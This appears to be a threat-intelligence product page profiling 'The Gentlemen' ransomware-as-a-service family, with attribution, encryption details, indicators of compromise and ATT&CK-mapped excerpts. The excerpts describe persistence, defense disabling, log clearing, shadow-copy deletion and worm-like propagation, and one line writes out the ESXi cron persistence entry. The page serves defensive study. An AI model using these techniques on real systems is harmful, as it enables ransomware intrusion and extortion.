The Gentlemen
The Gentlemen is a ransomware-as-a-service (RaaS) operation that emerged around mid-2025 and rapidly became one of the most active ransomware and extortion threats by early 2026. It is associated in reporting with affiliates, and Microsoft tracks the operators as Storm-2697. Multiple sources describe links to the Qilin ecosystem and report that the operation is reportedly managed by the Russian-speaking actor known as hastalamuerte or zeta88, though those attribution details are reporting-based rather than universally confirmed.
The malware supports multi-platform targeting. Reporting describes lockers for Windows, Linux, NAS, BSD, and VMware ESXi; the Windows variant is written in Go, while one report states the ESXi locker is written in C. The Windows encryptor requires a build-specific password at execution, a feature noted as helping evade automated analysis. The malware uses hybrid encryption based on XChaCha20 and Curve25519/X25519, including per-file ephemeral keys; one Microsoft-analyzed sample appended a Base64-encoded ephemeral public key and a GENTLEMEN marker to encrypted files. Smaller files are fully encrypted, while larger files are partially encrypted in chunks to accelerate impact. Encrypted files have been observed with the .umc16h extension, random six-character extensions, and incident-specific extensions such as .fjn1jw. Ransom notes observed in reporting include README-GENTLEMEN.txt and READMEGENTLEMEN.txt, and a wallpaper artifact gentlemen.bmp is also associated with the family.
The Gentlemen uses double extortion: operators exfiltrate data before encryption and threaten publication on a leak site if victims do not pay. Reporting also notes negotiations via Tox or Session identifiers and use of a public leak portal. The operation has publicly claimed hundreds of victims across more than 70 countries, with activity observed across North America, South America, Europe, Africa, and Asia. Sectors explicitly mentioned in the content include education, transportation, healthcare, financial services, manufacturing, professional services, technology, construction, shipping, enterprise, and infrastructure organizations.
Observed tradecraft is mature and enterprise-focused. The malware and associated operators disable Microsoft Defender real-time monitoring, add exclusions, delete Volume Shadow Copies, clear Windows event logs, remove forensic artifacts, terminate backup/security/database/virtualization-related processes and services, and establish persistence via scheduled tasks and Run registry keys. The ransomware can enumerate mapped drives and UNC shares, take ownership of files before encryption, optionally wipe free space, and self-delete. Microsoft reporting highlights especially aggressive self-propagation on Windows networks, with attempts to spread via SMB shares, PsExec, WMIC, scheduled tasks, services, PowerShell remoting, WMI, and Group Policy-based deployment.
Associated intrusion activity in reporting includes use of SystemBC proxy malware, Cobalt Strike, Mimikatz, AnyDesk, PowerShell, WinSCP, Nmap, Advanced IP Scanner, PsExec, WMI, and Group Policy Objects for domain-wide deployment. Initial access described in the content includes stolen credentials, exposed remote services, RDP, purchased access, and exploitation or targeting of edge devices such as Fortinet FortiGate and Cisco systems; tracked vulnerabilities mentioned in reporting include CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073. Huntress documented incidents involving compromised accounts over RDP, scheduled tasks, Defender tampering, deployment from NETLOGON, and a SOCKS proxy binary communicating with 193.233.202[.]17 and 77.110.122[.]137. Additional infrastructure associated in reporting includes 91.107.247[.]163 and 45.86.230[.]112, and Microsoft published SHA-256 22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67 for a Gentlemen encryptor sample.
Detection names explicitly mentioned in the content include Ransom:Win64/Gentlemen and Ransom:Win64/Gentlemen.SH!MTB. The content also notes a publicly released decryptor project described as recovering X25519 ephemeral keys from process memory dumps.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The Gentlemen, a ransomware-as-a-service (RaaS) operation, has quickly risen to become one of the most active ransomware programs in the world... Only once the network is firmly in their control do they deploy their custom ransomware locker and begin encrypting systems.
The Gentlemen, a ransomware-as-a-service (RaaS) operation, has quickly risen to become one of the most active ransomware programs in the world... Only once the network is firmly in their control do they deploy their custom ransomware locker and begin encrypting systems.
The Gentlemen, a ransomware-as-a-service (RaaS) operation, has quickly risen to become one of the most active ransomware programs in the world... Only once the network is firmly in their control do they deploy their custom ransomware locker and begin encrypting systems.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The Gentlemen ransomware is a ransomware-as-a-service (RaaS) threat that is distinguished by its ability to pair its strong per-file encryption with an aggressive self-propagation capability designed to enable broad network compromise.
The Gentlemen is an active ransomware and extortion operation that emerged publicly in the second half of 2025 and rapidly scaled into a high-volume threat actor.
Techniques & procedures
36 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniquesThe malware uses WMI via wmic.exe to create remote processes... The first command executes the defense evasion blob, the second runs the payload from the infected host’s SMB share, and the third runs the pre-staged copy from the target’s local C:\Temp directory.
ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the -- system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
This is complemented by the use of Cobalt Strike, Mimikatz, and domain-wide propagation via GPO, indicating a tightly coordinated, human-operated attack workflow...
Before attempting to run the payload on a remote system, the malware executes the following PowerShell command on the remote target to weaken local defenses... disables Microsoft Defender real-time monitoring, adds broad Defender exclusions, turns off Windows Firewall across all profiles...
To relaunch itself as SYSTEM, it issues the following sequence of commands... It first deletes any existing task named gentlemen_system... creates a new one-time task... and finally triggers that task.
Persistence
4 techniquesESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the -- system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
For establishing persistence with the registry... The GupdateS value under HKEY_LOCAL_MACHINE (HKLM) provides device-wide persistence... while the GupdateU value under HKEY_CURRENT_USER (HKCU) provides user-scoped persistence.
Privilege Escalation
4 techniquesESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the -- system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
For deployment and impact, the group has been observed using domain-level mechanisms such as Group Policy and NETLOGON-based staging to push ransomware across compromised environments.
Stealth
5 techniquesSystemBC establishes SOCKS5 network tunnels within the victim’s environment and connects to its C&C server using a custom RC4-encrypted protocol.
Ransomware components use generic names (r.exe, g.exe, o.exe) and common locations (C:\ProgramData\, C:\Temp\, admin shares) to blend with normal tools and admin activity.
It then clears the System, Application, and Security event logs using wevtutil to remove key audit trails.
These commands remove a variety of forensic artifacts, including prefetch files that track program execution, Defender diagnostic and support logs, and Remote Desktop Protocol (RDP) logs... If the -- keep flag is not provided, the malware attempts to remove its executable from disk after completing encryption.
The malware binary carries an embedded copy of PsExec and drops it to C:\Temp\psexec.exe... If the embedded PsExec payload cannot be extracted successfully, the malware falls back to downloading PsExec directly from Microsoft’s Sysinternals Live service.
Defense Impairment
2 techniquesFor establishing persistence with the registry... The GupdateS value under HKEY_LOCAL_MACHINE (HKLM) provides device-wide persistence... while the GupdateU value under HKEY_CURRENT_USER (HKCU) provides user-scoped persistence.
Credential Access
1 techniqueThis is complemented by the use of Cobalt Strike, Mimikatz...
Discovery
8 techniquesIn addition to terminating processes, the malware disables and stops a list of Windows services using the commands...
After dropping PsExec, the malware attempts to enumerate and discover remote systems on the network, including workstations, servers, and domain controllers. Each discovered host becomes a candidate target for propagation.
The -- spread argument accepts either explicit credentials in domain/user:password format for authenticated lateral movement, or an empty string to reuse the current session’s authentication token.
The malware stops a list of running processes using the command... The table below summarizes the different categories and processes being targeted.
The malware can only perform this task if it’s executed from an account with administrator privilege.
To enumerate all available volumes on the system, the malware executes the following PowerShell command sequence... performs a secondary enumeration routine by iterating through drive letters A through Z...
When the command-line argument -- shares is provided, the malware initiates network share discovery and enumeration. It begins by probing all drive letters A through Z to identify mapped network drives...
Before encryption, the malware attempts to stop services and processes associated with databases, backup software, virtualization platforms, remote access tools, and enterprise applications.
Lateral Movement
3 techniquesThe commands copy the malware executable into C:\Temp, creates a hidden Server Message Block (SMB) share named share$ pointing to that directory... other systems on the network can retrieve the payload from \\<self>\share$. | The malware executes the following command sequence to create three Windows services on the target host... These services run as SYSTEM by default, which provides another high-privilege execution path for the ransomware payload on the remote system.
Using PowerShell remoting, the malware executes commands directly on the target using Invoke-Command. This method leverages Windows Remote Management (WinRM)...
The malware first stages its payload on the remote system by copying the encryptor binary over the administrative C$ share.
Command and Control
2 techniquesThe adoption of SystemBC proxy malware, a SOCKS5-based botnet with over 1,570 infected corporate hosts, marks a transition from isolated intrusions to botnet-assisted, covert payload delivery at scale.
Using X25519 (the Diffie–Hellman primitive over Curve25519), it derives two values: first, the ephemeral public key ... and second, a shared secret by combining the ephemeral private key with the attacker’s public key.
Exfiltration
2 techniquesThe group also steals data before locking systems, using that stolen information as additional lever to pressure victims into paying.
The operators behind the ransomware use double extortion tactics, encrypting data while also exfiltrating sensitive information to pressure victims through the threat of public release if the ransom is not paid.
Impact
4 techniquesThe operators behind the ransomware use double extortion tactics, encrypting data while also exfiltrating sensitive information to pressure victims through the threat of public release if the ransom is not paid.
In addition to terminating processes, the malware disables and stops a list of Windows services... backup, storage, and recovery software... EDR... Microsoft Exchange...
To further impede recovery efforts, the malware deletes all Volume Shadow Copies using both vssadmin and wmic... If the -- wipe argument is provided... overwrites all unallocated disk space with random data.
The group also steals data before locking systems, using that stolen information as additional lever to pressure victims into paying... The group uses stolen data as a central part of its pressure strategy, threatening to publish sensitive files on its leak site if victims refuse to pay.
Other
2 techniquesIOCs tracked for this family
102 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Go-based ransomware-as-a-service for Windows that uses Curve25519 and XChaCha20 for per-file encryption, employs double extortion, disables defenses, establishes persistence, traverses local and network shares, and includes aggressive worm-like lateral movement using PsExec, WMI, scheduled tasks, services, and PowerShell remoting.
A ransomware-as-a-service operation active since mid-2025. In the described incidents, operators used Scheduled Tasks, PowerShell, log clearing, and antivirus evasion to deploy encryptors, then dropped README-GENTLEMEN.txt ransom notes and encrypted files.
Multi-platform ransomware used in large-scale enterprise attacks across Windows, Linux, NAS, BSD, and VMware ESXi environments. It encrypts files, drops a READMEGENTLEMEN.txt ransom note, stops database/backup/virtualization services before encryption, and uses stolen data for double extortion.
Multi-platform ransomware with extortion capabilities targeting Windows, Linux, NAS, BSD, and VMware ESXi environments. It uses data theft as a core pressure tactic, stops services and processes before encryption, and supports enterprise-wide deployment workflows.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.